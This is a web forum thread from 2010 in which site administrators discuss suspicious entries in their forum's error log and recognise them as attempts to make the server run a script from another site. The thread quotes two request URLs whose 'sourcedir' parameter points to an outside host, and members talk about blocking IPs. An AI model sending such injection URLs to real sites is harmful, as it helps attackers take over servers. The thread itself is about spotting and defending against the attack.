Welcome, Guest. Please login or register.

ShoutBox!

 

Skhilled

2024-08-09, 18:19:29
Awww! Poor thing! LOL
 

Ken

2024-08-09, 09:20:52
 

Skhilled

2024-07-06, 10:33:18
 :D
 

Ken

2024-07-06, 06:40:47
Happy Saturday after the 4th of July!
 :fireworks:
 

Skhilled

2024-07-04, 20:27:02
Happy Day Off From Work!  :D
 

Ken

2024-06-25, 06:23:12
84... who knew?  laughing7
...2013 was my *magic* year
 

Skhilled

2024-06-14, 22:09:12
I hope so! LOL
 

Ken

2024-06-14, 21:41:30
My B-Day is forthcoming and maybe it will be far enough along so that I can be a regular Dancing Fool for that day!!! :banana: :2funny:
 

Ken

2024-06-14, 21:38:38
Happy Friday everyone! I'm  SOOO glad to see Friday and not just because it's the weekend, but because it marks one more day in the recovery of my foot!  laughing7

Scrubmeister

2024-04-19, 10:32:40
Good to see the site back faster than ever. :)

Recent Topics

TP Articles


Search in titles
Search in article texts

Author Topic: Possible Hack or Attack?  (Read 2662 times)

0 Members and 1 Guest are viewing this topic.

Offline Ken (OP)

  • Vietnam Era Veteran
  • Administrator
  • *
  • Posts: 11937
  • Gender: Male
  • View Gallery
Possible Hack or Attack?
« on: September 14, 2010, 01:09:22 PM »
Got a bunch of strange errors in the log:
Code: [Select]

http://www.ourfamilyforum.org/FamilyForum/index.php?topic=2600.0%20%20/?sourcedir=http://samaraeda.ru/File/id1?

8: Undefined variable: context

File: /home/kenkayjm/public_html/FamilyForum/Sources/Subs.php(1114) : runtime-created function
Line: 27

There's two pages of 'em... wonder if this is some kind of attempt at hacking the site?
"Not all who wander are lost."-Tolkien
Yesterday When I was Young.

Offline IchBin?

Re: Possible Hack or Attack?
« Reply #1 on: September 14, 2010, 07:32:17 PM »
Yes, that is an attempted hack. Shouldn't have to worry about it though, SMF cleans the URL's pretty good.
I love cheese cake.

Offline Ken (OP)

  • Vietnam Era Veteran
  • Administrator
  • *
  • Posts: 11937
  • Gender: Male
  • View Gallery
Re: Possible Hack or Attack?
« Reply #2 on: September 15, 2010, 07:57:05 PM »
Looks like they're at it again today.
Quote
http://www.ourfamilyforum.org/FamilyForum/index.php?board=26.0///?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg???
8: Undefined index: board_note
File: /home/kenkayjm/public_html/FamilyForum/Themes/pandora20rc3/MessageIndex.template.php (main sub template - eval?)
Line: 183
"Not all who wander are lost."-Tolkien
Yesterday When I was Young.

Offline IchBin?

Re: Possible Hack or Attack?
« Reply #3 on: September 15, 2010, 08:16:33 PM »
I get them just about everyday myself. You should see the server logs with bots attempting to hack all sorts of different software.... I've been banning at my server firewall if any of them make more than just a few attempts. Getting tired of it though, and I'm about to write my own little java program to parse the logs and do it for me. lol
I love cheese cake.

Offline Ken (OP)

  • Vietnam Era Veteran
  • Administrator
  • *
  • Posts: 11937
  • Gender: Male
  • View Gallery
Re: Possible Hack or Attack?
« Reply #4 on: September 15, 2010, 08:26:10 PM »
That might make a good app or mod for SMF users.  :bigthumb:
"Not all who wander are lost."-Tolkien
Yesterday When I was Young.

Offline IchBin?

Re: Possible Hack or Attack?
« Reply #5 on: September 16, 2010, 10:05:24 AM »
That would be nice, but the type of program I would write would have to be run on the server, so it's not something most would have access too.
I love cheese cake.

Offline Skhilled

  • Administrator
  • *
  • Posts: 9424
  • Gender: Male
  • All of my passwords are protected by amnesia...
  • View Gallery
    • Buildz Hosting
Re: Possible Hack or Attack?
« Reply #6 on: September 18, 2010, 05:15:53 AM »
Yeah, anything with a 2nd URL after your own URL or has ??? in the URL is a hack. They're trying to run a script from another site. Been battling that for a few years now since that Joomla/Mambo hacking a few years ago.

I'm with you, Brad. I usually block the IP on the server if they start to do it too much. I would be interested in seeing that JS program once you get started on it.

I've been wondering for quite awhile if there was a way to do it via a cron job...just never got around to exploring it.